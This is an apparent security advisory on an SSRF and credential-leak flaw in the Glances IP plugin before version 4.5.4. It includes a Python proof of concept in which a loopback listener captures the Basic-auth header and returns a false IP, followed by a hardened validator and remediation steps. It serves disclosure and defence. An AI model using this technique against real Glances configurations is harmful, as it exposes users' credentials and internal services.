Glances Server-Side Request Forgery Vulnerability in IP Plugin Allows Credential Leakage
Vulnerability
A Server-Side Request Forgery (SSRF) vulnerability has been identified in the Glances IP plugin prior to version 4.5.4. The plugin uses the public_api configuration parameter as the target of an outbound HTTP request without validating its scheme or its hostname/IP address, so whoever controls that parameter controls where the request is sent, including internal or external endpoints. If public_username and public_password are also configured, the plugin attaches them to the same request in an Authorization: Basic header; a public_api value pointing at an attacker-controlled server therefore discloses those credentials, and because Basic authentication is only base64 encoding, the plaintext password is trivially recovered from the header. Exploitation could be used to reach internal network services, retrieve data from cloud metadata endpoints, and exfiltrate credentials over outbound HTTP.
Impact
Exploitation allows unauthorized outbound HTTP requests whose destination the attacker chooses through the public_api parameter. This enables SSRF against internal services and cloud metadata endpoints and, because the plugin trusts whatever the endpoint returns, lets an attacker-controlled endpoint feed manipulated data (such as a false public IP address) back into Glances. The precondition is the ability to set public_api, i.e. write access to the Glances configuration, so the exposure is greatest where configuration files are templated, shared, or editable by less-trusted users.
Reproduction
To reproduce this vulnerability, create a Glances configuration file in which the IP plugin's public_api is a URL pointing at a local listener (for example, a simple HTTP server on 127.0.0.1) and public_username and public_password are set. Start Glances with that configuration: the IP plugin sends a request to the listener and includes an Authorization: Basic header built from the configured credentials, which the listener records. Reaching an arbitrary (here, loopback) address demonstrates the SSRF, and the recorded header demonstrates the credential leak.
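The reproduction above, as an added, self-contained example rather than Glances project code: it parses a constructed configuration fragment (the section name `[ip]` and key names are assumed to match the plugin's configuration), runs a loopback listener that records the Authorization header, performs the request the way the advisory describes the pre-4.5.4 plugin behaving (URL used as-is, credentials attached whenever set), and then shows a hardened `validate_public_api` check of the kind a fix would need. That check is an assumed design for illustration, not the upstream patch.

```python
"""Reproduce the Glances IP-plugin SSRF / credential-leak pattern offline.

Added example, not Glances project code. The config fragment, the listener,
the request helper and the validator are all constructed here; only the
parameter names public_api / public_username / public_password come from
the advisory, and the [ip] section name is an assumption.
"""
import base64
import configparser
import ipaddress
import threading
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed config: an attacker-chosen public_api pointing at a listener
# they control (filled in at runtime with the loopback listener's port).
CONF_TEMPLATE = """
[ip]
public_api={api}
public_username=alice
public_password=s3cret
"""


def load_ip_section(text):
    """Parse the constructed config and return the [ip] section as a dict."""
    cp = configparser.ConfigParser()
    cp.read_string(text)
    return dict(cp["ip"])


def basic_auth_header(username, password):
    """Build the Authorization: Basic value (base64 of user:password)."""
    token = base64.b64encode(f"{username}:{password}".encode()).decode()
    return "Basic " + token


def vulnerable_fetch(section):
    """Pre-4.5.4 behaviour as the advisory describes it: use public_api
    verbatim (no scheme/host check) and attach credentials whenever set."""
    req = urllib.request.Request(section["public_api"])
    if section.get("public_username") and section.get("public_password"):
        req.add_header("Authorization", basic_auth_header(
            section["public_username"], section["public_password"]))
    with urllib.request.urlopen(req, timeout=5) as resp:
        return resp.read().decode().strip()


def validate_public_api(url, allowed_hosts=None):
    """Hardened check (assumed design, not the upstream patch): https only,
    a hostname must be present, no credentials embedded in the URL, literal
    IPs must be globally routable, and an optional allow-list pins the host.
    Returns None when acceptable, otherwise a short reason string."""
    parts = urllib.parse.urlsplit(url)
    if parts.scheme != "https":
        return "scheme must be https"
    if not parts.hostname:
        return "missing hostname"
    if parts.username or parts.password:
        return "credentials in URL not allowed"
    try:
        ip = ipaddress.ip_address(parts.hostname)
    except ValueError:
        ip = None  # a DNS name; must be re-checked after resolution (rebinding)
    if ip is not None and not ip.is_global:
        return f"non-global address {ip}"
    if allowed_hosts is not None and parts.hostname not in allowed_hosts:
        return f"host {parts.hostname} not in allow-list"
    return None


class _Capture(BaseHTTPRequestHandler):
    """Attacker's listener: records the request and returns a chosen body."""
    captured = {}

    def do_GET(self):
        _Capture.captured["path"] = self.path
        _Capture.captured["authorization"] = self.headers.get("Authorization")
        body = b"203.0.113.7\n"  # attacker-chosen "public IP" fed back to the plugin
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the demo quiet
        pass


def reproduce():
    """Start a loopback listener, point the config at it, run the vulnerable
    fetch, and return what the listener saw plus what the plugin would use."""
    server = HTTPServer(("127.0.0.1", 0), _Capture)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        api = f"http://127.0.0.1:{server.server_port}/ip"
        section = load_ip_section(CONF_TEMPLATE.format(api=api))
        body = vulnerable_fetch(section)
        return {"url": api, "body": body, **_Capture.captured}
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    result = reproduce()
    print("listener saw:", result["authorization"], "on", result["path"])
    print("plugin would report public IP:", result["body"])
    print("hardened check on that URL:", validate_public_api(result["url"]))
```

Decoding the captured header with `base64 -d` yields `alice:s3cret`, which is the credential leak the advisory describes. The validator rejects plain http, loopback and link-local literals such as the cloud metadata address, but a DNS name can still resolve to an internal address after the check, so a real fix must apply the same address test to the resolved IP at connection time or pin public_api to an allow-list.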
Remediation
Users should update Glances to version 4.5.4 or later, where this vulnerability has been patched. Until the update is applied, restrict write access to the Glances configuration file to trusted users, leave public_username and public_password unset unless the configured public_api endpoint actually requires them, and treat any credentials that were configured alongside an untrusted public_api value as exposed.
